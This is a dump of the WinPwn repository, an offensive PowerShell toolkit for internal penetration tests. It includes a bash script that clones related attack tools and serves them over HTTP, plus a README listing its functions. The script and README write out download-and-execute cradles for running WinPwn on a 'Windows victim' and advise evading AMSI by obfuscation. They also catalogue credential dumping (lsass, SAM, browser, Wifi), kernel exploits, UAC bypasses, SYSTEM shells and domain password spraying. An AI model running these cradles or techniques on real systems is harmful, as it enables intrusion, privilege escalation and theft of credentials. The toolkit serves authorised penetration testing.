├── .github └── FUNDING.yml ├── .gitmodules ├── Get_WinPwn_Repo.sh ├── LICENSE ├── Offline_WinPwn.ps1 ├── README.md ├── WinPwn.ps1 └── images ├── Kovert.png ├── README.MD ├── WinPwn.JPG └── happy_alp.png /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: [S3cur3Th1sSh1t] 4 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/a69199b1b60bb175f6093f7a2d31b600020613ab/.gitmodules -------------------------------------------------------------------------------- /Get_WinPwn_Repo.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Downloadscript for a local WinPwn repository by 0x23353435 3 | # All WinPwn functions can be used over a local Webserver on victims without internet connection. 4 | # After installing this local repo you can either use the --start-server options of this script or start an own one with the following command: 5 | # python3 -m http.server {Portnumber} 6 | # To make WinPwn.ps1 use this script just use the parameter -repo: 7 | # PS> iex (new-object net.webclient).downloadstring('http://{IP-Address}:{Portnumber}/WinPwn_Repo/WinPwn/master/WinPwn.ps1') 8 | # PS> WinPwn -repo http://{IP-Address}:{Portnumber}/WinPwn_Repo 9 | 10 | echo -e "\e[1;94m__ ___ ____ " 11 | echo -e "\ \ / (_)_ __ | _ \__ ___ __ " 12 | echo -e " \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ " 13 | echo -e " \ V V / | | | | | __/ \ V V /| | | |" 14 | echo -e " \_/\_/ |_|_| |_|_| \_/\_/ |_| |_|" 15 | echo -e " " 16 | echo -e " ---> Create your local WinPwn repo! \e[0m\n" 17 | 18 | function show-help () { 19 | echo -e "Usage:" 20 | echo -e "\e[1;94m./Get_WinPwn_Repo.sh {Option}\e[0m\n" 21 | echo -e "Example:" 22 | echo -e "\e[1;94m./Get_WinPwn_Repo.sh --install\e[0m\n" 23 | echo -e "Options:" 24 | echo -e "\e[1;94m--install\e[0m Download the repository and place it to \e[1;94m./WinPwn_Repo/\e[0m" 25 | echo -e "\e[1;94m--remove\e[0m Remove the repository \e[1;94m./WinPwn_Repo/\e[0m" 26 | echo -e "\e[1;94m--reinstall\e[0m Remove the repository and download a new one to \e[1;94m./WinPwn_Repo/\e[0m" 27 | echo -e "\e[1;94m--start-server\e[0m Start a \e[1;94mpython HTTP server\e[0m on port 8000" 28 | echo -e "\e[1;94m--help\e[0m Show this help" 29 | } 30 | 31 | function install () { 32 | echo -e "\e[1;94mGetting PowerSharpPack...\e[0m" 33 | git clone https://github.com/S3cur3Th1sSh1t/PowerSharpPack ./WinPwn_Repo/PowerSharpPack/master/ 34 | echo -e "\n\e[1;94mGetting WinPwn...\e[0m" 35 | git clone https://github.com/S3cur3Th1sSh1t/WinPwn ./WinPwn_Repo/WinPwn/master/ 36 | echo -e "\n\e[1;94mGetting SharpCradle...\e[0m" 37 | git clone https://github.com/S3cur3Th1sSh1t/Invoke-Sharpcradle ./WinPwn_Repo/Invoke-Sharpcradle/master/ 38 | echo -e "\n\e[1;94mGetting Creds...\e[0m" 39 | git clone https://github.com/S3cur3Th1sSh1t/Creds ./WinPwn_Repo/Creds/master/ 40 | echo -e "\n\e[1;94mGetting TeamViewerDecrypt...\e[0m" 41 | git clone https://github.com/S3cur3Th1sSh1t/TeamViewerDecrypt ./WinPwn_Repo/TeamViewerDecrypt/master/ 42 | echo -e "\n\e[1;94mGetting Get-System-Techniques...\e[0m" 43 | git clone https://github.com/S3cur3Th1sSh1t/Get-System-Techniques ./WinPwn_Repo/Get-System-Techniques/master/ 44 | echo -e "\n\e[1;94mGetting ACLight...\e[0m" 45 | git clone https://github.com/S3cur3Th1sSh1t/ACLight ./WinPwn_Repo/ACLight/master/ 46 | echo -e "\n\e[1;94mGetting SpoolerScanner...\e[0m" 47 | git clone https://github.com/S3cur3Th1sSh1t/SpoolerScanner ./WinPwn_Repo/SpoolerScanner/master/ 48 | 49 | echo -e "\n\e[1;94mDone!\e[0m" 50 | echo -e "\nThe local repository can be found under: \e[1;94m$PWD/WinPwn_Repo/\e[0m" 51 | echo -e "\nNow you can open a \e[1;94mpython HTTP server\e[0m here to to use \e[1;94mWinPwn.ps1\e[0m with this custom repo." 52 | echo -e "Example usage on your Windows victim:" 53 | echo -e "\e[1;94mPS> \e[94miex (new-object net.webclient).downloadstring('\e[91mhttp://192.168.1.10:8000/WinPwn_Repo\e[94m/WinPwn/master/WinPwn.ps1')\e[0m" 54 | echo -e "\e[1;94mPS> \e[94mWinPwn -repo \e[91mhttp://192.168.1.10:8000/WinPwn_Repo\e[0m" 55 | } 56 | 57 | function remove () { 58 | rm -rf ./WinPwn_Repo 59 | echo -e "\n\e[1;94mDone!\e[0m" 60 | echo -e "\nThe local repository was removed!" 61 | } 62 | 63 | function start-server () { 64 | python3 -m http.server 8000 65 | } 66 | 67 | if [ "$#" -eq 1 ]; then 68 | case $1 in 69 | "--install" ) 70 | install 71 | ;; 72 | "--reinstall" ) 73 | remove 74 | install 75 | ;; 76 | "--remove" ) 77 | remove 78 | ;; 79 | "--start-server" ) 80 | start-server 81 | ;; 82 | * ) 83 | show-help 84 | ;; 85 | esac 86 | else 87 | show-help 88 | fi 89 | 90 | exit 0 91 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2019, SecureThisShit 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![](https://img.shields.io/badge/Donate-Bitcoin-blue.svg?style=flat)](https://blockchain.info/address/1MXReD1F4w5SUXK3phLVJ5M8KrXJHfecmZ) 2 | 3 | # Sponsored by 4 | 5 | [](https://www.bluebastion.net/)       6 | 7 | # WinPwn 8 | In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. I also often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration. 9 | The script is mostly based on well-known large other offensive security Powershell projects. 10 | 11 | Any suggestions, feedback, Pull requests and comments are welcome! 12 | 13 | Just Import the Modules with: 14 | 15 | `Import-Module .\WinPwn.ps1` or 16 | `iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')` 17 | 18 | To bypass AMSI take one of the existing [bypass techniques](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell), find the AMSI [trigger](https://github.com/RythmStick/AMSITrigger) and manually change it in the bypass function or encode the trigger string. Alternatively obfuscate the whole script. 19 | 20 | If you find yourself stuck on a windows system with no internet access - no problem at all, just use `Offline_Winpwn.ps1`, the most important scripts and executables are included. 21 | 22 | Functions available after Import: 23 | * #### `WinPwn` -> Menu to choose attacks: 24 | ![alt text](https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/images/WinPwn.JPG) 25 | * #### `Inveigh` -> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integrated 26 | * #### `SessionGopher` -> Executes Sessiongopher Asking you for parameters 27 | * #### `Kittielocal` -> 28 | * Obfuscated Invoke-Mimikatz version 29 | * Safetykatz in memory 30 | * Dump lsass using rundll32 technique 31 | * Download and run obfuscated Lazagne 32 | * Dump Browser credentials 33 | * Customized Mimikittenz Version 34 | * Exfiltrate Wifi-Credentials 35 | * Dump SAM-File NTLM Hashes 36 | * SharpCloud 37 | * #### `Localreconmodules` -> 38 | * Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more 39 | * Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP 40 | * Checks the Powershell event logs for credentials or other sensitive informations 41 | * Collect Browser Credentials and history 42 | * Search for passwords in the registry and on the file system 43 | * Find sensitive files (config files, RDP files, keepass Databases) 44 | * Search for .NET Binaries on the local system 45 | * Optional: Get-Computerdetails (Powersploit) and PSRecon 46 | * #### `Domainreconmodules` -> 47 | * Collect various domain informations for manual review 48 | * Find AD-Passwords in description fields 49 | * Search for potential sensitive domain share files 50 | * Unconstrained delegation systems/users are enumerated 51 | * Generate Bloodhound Report 52 | * MS17-10 Scanner for domain systems 53 | * Bluekeep Scanner for domain systems 54 | * SQL Server discovery and Auditing functions - PowerUpSQL 55 | * MS-RPRN Check for Domaincontrollers or all systems 56 | * Group Policy Audit with Grouper2 57 | * An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon 58 | * Check Printers for common vulns 59 | * Search for Resource-Based Constrained Delegation attack paths 60 | * Check all DCs for zerologon - CVE-2020-1472 61 | * And more, just take a look 62 | * #### `Privescmodules` 63 | * itm4ns Invoke-PrivescCheck 64 | * winPEAS 65 | * Powersploits PowerUp Allchecks, Sherlock, GPPPasswords 66 | * Dll Hijacking, File Permissions, Registry permissions and weak keys, Rotten/Juicy Potato Check 67 | * #### `kernelexploits` -> 68 | * MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only! 69 | * MS16-032 - (2008/7/8/10/2012)! 70 | * MS16-135 - (WS2k16 only)! 71 | * CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1! 72 | * CVE-2019-0841 - April 2019! 73 | * CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019! 74 | * CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019! 75 | * CVE-2019-1215 - September 2019 - x64 only! 76 | * CVE-2020-0638 - February 2020 - x64 only! 77 | * CVE-2020-0796 - SMBGhost 78 | * CVE-2020-0787 - March 2020 - all windows versions 79 | * CVE-2021-34527/CVE-2021-1675 - June 2021 - PrintNightmare 80 | * CVE-2021-40449 - CallbackHell - October 2021 81 | * Juicy-Potato Exploit 82 | * itm4ns Printspoofer 83 | * #### `UACBypass` -> 84 | * UAC Magic, Based on James Forshaw's three part post on UAC 85 | * UAC Bypass cmstp technique, by Oddvar Moe 86 | * DiskCleanup UAC Bypass, by James Forshaw 87 | * DccwBypassUAC technique, by Ernesto Fernandez and Thomas Vanhoutte 88 | * #### `SYSTEMShell` -> 89 | * Pop System Shell using CreateProcess 90 | * Pop System Shell using NamedPipe Impersonation 91 | * Pop System Shell using Token Manipulation 92 | * Bind System Shell using UsoClient DLL load or CreateProcess 93 | * #### `Shareenumeration` -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit) 94 | * #### `Domainshares` -> Snaffler or Passhunt search over all domain systems 95 | * #### `Groupsearch` -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) 96 | * #### `Kerberoasting` -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking 97 | * #### `PowerSQL` -> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection Attacks 98 | * #### `Sharphound` -> Bloodhound 3.0 Report 99 | * #### `Adidnsmenu` -> Create Active Directory-Integrated DNS Nodes or remove them 100 | * #### `MS17-10` -> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerability 101 | * #### `Sharpcradle` -> Load C# Files from a remote Webserver to RAM 102 | * #### `DomainPassSpray` -> DomainPasswordSpray Attacks, one password for all domain users 103 | * #### `Bluekeep` -> Bluekeep Scanner for domain systems 104 | 105 | Without parameters, most of the functions can only be used from an interactive shell. So i decided to add the parameters `-noninteractive` and `-consoleoutput` to make the script usable from 106 | an asynchronous C2-Framework like Empire, Covenant, Cobalt Strike or others. 107 | Additionally the `-repo` parameter was added to use WinPwn with all its features from a local repository. They can be used as follows: 108 | 109 | Usage: 110 | 111 | -noninteractive -> No questions for functions so that they run with predefined or user defined parameters 112 | 113 | -consoleoutput -> The loot/report folders are not created. Every function returns the output to the console 114 | so that you can take a look at everything in the Agent logs of your C2-Framework 115 | Examples: 116 | 117 | `WinPwn -noninteractive -consoleoutput -DomainRecon` -> This will return every single domain recon script and 118 | function and will probably give you really much output 119 | 120 | `WinPwn -noninteractive -consoleoutput -Localrecon` -> This will enumerate as much information for the local 121 | system as possible 122 | 123 | `Generalrecon -noninteractive` -> Execute basic local recon functions and store the output 124 | in the corresponding folders 125 | 126 | `UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp` -> Execute a stager in a high integrity 127 | process from a low privileged session 128 | 129 | `Kittielocal -noninteractive -consoleoutput -browsercredentials` -> Dump Browser-Credentials via Sharpweb 130 | returning the output to console 131 | 132 | `Kittielocal -noninteractive -browsercredentials` -> Dump SAM File NTLM-Hashes and store 133 | the output in a file 134 | 135 | `WinPwn -PowerSharpPack -consoleoutput -noninteractive` -> Execute Seatbelt, PowerUp, Watson and 136 | more C# binaries in memory 137 | 138 | `Dotnetsearch -consoleoutput -noninteractive` -> Search in `C:\Program Files\` and `C:\Program Files (x86)\` for .NET assemblies 139 | 140 | `WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo` -> Use a local webserver as offline repo to use WinPwn without internet access 141 | 142 | Get_WinPwn_Repo.sh: 143 | 144 | Usage: 145 | ./Get_WinPwn_Repo.sh {Option} 146 | 147 | Example: 148 | ./Get_WinPwn_Repo.sh --install 149 | 150 | Options: 151 | --install Download the repository and place it to ./WinPwn_Repo/ 152 | --remove Remove the repository ./WinPwn_Repo/ 153 | --reinstall Remove the repository and download a new one to ./WinPwn_Repo/ 154 | --start-server Start a python HTTP server on port 8000 155 | --help Show this help 156 | 157 | ## TO-DO 158 | - [x] Some obfuskation 159 | - [x] More obfuscation 160 | - [ ] Proxy via PAC-File support 161 | - [x] Get the scripts from my own creds repository (https://github.com/S3cur3Th1sSh1t/Creds) to be independent from changes in the original repositories 162 | - [ ] More Recon/Exploitation functions 163 | - [x] Add menu for better handling of functions 164 | - [x] Amsi Bypass 165 | - [X] Block ETW 166 | 167 | ## CREDITS 168 | 169 | - [X] [Kevin-Robertson](https://github.com/Kevin-Robertson/) - Inveigh, Powermad, Invoke-TheHash 170 | - [X] [Arvanaghi](https://github.com/Arvanaghi/) - SessionGopher 171 | - [X] [PowerShellMafia](https://github.com/PowerShellMafia/) - Powersploit 172 | - [X] [Dionach](https://github.com/Dionach/) - PassHunt 173 | - [X] [A-mIn3](https://github.com/A-mIn3/) - WINSpect 174 | - [X] [411Hall](https://github.com/411Hall/) - JAWS 175 | - [X] [sense-of-security](https://github.com/sense-of-security/) - ADrecon 176 | - [X] [dafthack](https://github.com/dafthack/) - DomainPasswordSpray 177 | - [X] [rasta-mouse](https://github.com/rasta-mouse/) - Sherlock, Amsi Bypass, PPID Spoof & BlockDLLs 178 | - [X] [AlessandroZ](https://github.com/AlessandroZ/) - LaZagne 179 | - [X] [samratashok](https://github.com/samratashok/) - nishang 180 | - [X] [leechristensen](https://github.com/leechristensen/) - Random Repo, Spoolsample, other ps1 scripts 181 | - [X] [HarmJ0y](https://github.com/HarmJ0y) - Many good Blogposts, Gists and Scripts, all Ghostpack binaries 182 | - [X] [NETSPI](https://github.com/NetSPI/) - PowerUpSQL 183 | - [X] [Cn33liz](https://github.com/Cn33liz/) - p0wnedShell 184 | - [X] [rasta-mouse](https://github.com/rasta-mouse/) - AmsiScanBufferBypass 185 | - [X] [l0ss](https://github.com/l0ss/) - Grouper2,Snaffler,Grouper3 186 | - [X] [dafthack](https://github.com/dafthack/) - DomainPasswordSpray 187 | - [X] [enjoiz](https://github.com/enjoiz/Privesc) - PrivEsc 188 | - [X] [itm4n](https://github.com/itm4n) - Invoke-PrivescCheck & PrintSpoofer 189 | - [X] [James Forshaw](https://github.com/tyranid) - UACBypasses 190 | - [X] [Oddvar Moe](https://github.com/api0cradle) - UACBypass 191 | - [X] [Carlos Polop](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) - winPEAS 192 | - [X] [gentilkiwi](https://github.com/gentilkiwi) - Mimikatz, Kekeo 193 | - [X] [hlldz](https://github.com/hlldz) - Invoke-Phantom 194 | - [X] [Matthew Graeber](https://github.com/mattifestation) - many Ps1 Scripts which are nearly used everywhere 195 | - [X] [Steve Borosh](https://github.com/rvrsh3ll/) - Misc-Powershell-Scripts, SharpPrinter, SharpSSDP 196 | - [X] [Sean Metcalf](https://twitter.com/PyroTek3) - SPN-Scan + many usefull articles @adsecurity.org 197 | - [X] [@l0ss and @Sh3r4](https://github.com/SnaffCon/Snaffler) - Snaffler 198 | - [X] [FSecureLABS](https://github.com/FSecureLABS) - GPO Tools 199 | - [X] [vletoux](https://github.com/vletoux) - PingCastle Scanners 200 | - [X] [NCCGroup + BC-Security](https://github.com/BC-SECURITY/Invoke-ZeroLogon) - ZeroLogon Scanner 201 | - [X] [All people working on Bloodhound](https://github.com/BloodHoundAD) - SharpHound Collector 202 | - [X] [klezVirus](https://github.com/klezVirus) - SharpLdapRelayScan 203 | - [X] [cube0x0](https://github.com/cube0x0) - LdapSignCheck + other toolings 204 | - [X] [@s4ntiago_p](https://twitter.com/s4ntiago_p) - NanoDump 205 | - [X] [@thefLinkk](https://twitter.com/thefLinkk) - Handlekatz 206 | - [X] [@Mayyhem](https://github.com/Mayyhem/SharpSCCM) - SharpSCCM 207 | - [X] [@cube0x0](https://github.com/cube0x0/LdapSignCheck) - LdapSignCheck 208 | - [X] [@klezVirus](https://github.com/klezVirus/SharpLdapRelayScan) - SharpLdapRelayScan 209 | - [X] [@HarmJ0y, @leechristensen, @CCob](https://github.com/GhostPack/Certify/) - Certify 210 | - [X] [@Yudasm](https://github.com/Friends-Security/ShadowHound) - ShadowHound 211 | - [X] [Many more people in the Community](https://github.com/search?q=infosec) - I'm sure, that I've forgotten many other invididuals who indirectly contributed into this Script 212 | 213 | ## Stargazers over time 214 | 215 | [![Stargazers over time](https://starchart.cc/S3cur3Th1sSh1t/WinPwn.svg)](https://starchart.cc/S3cur3Th1sSh1t/WinPwn) 216 | 217 | ## Legal disclaimer: 218 | Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes. 219 | -------------------------------------------------------------------------------- /images/Kovert.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/a69199b1b60bb175f6093f7a2d31b600020613ab/images/Kovert.png -------------------------------------------------------------------------------- /images/README.MD: -------------------------------------------------------------------------------- 1 | Just Pictures 2 | -------------------------------------------------------------------------------- /images/WinPwn.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/a69199b1b60bb175f6093f7a2d31b600020613ab/images/WinPwn.JPG -------------------------------------------------------------------------------- /images/happy_alp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/a69199b1b60bb175f6093f7a2d31b600020613ab/images/happy_alp.png --------------------------------------------------------------------------------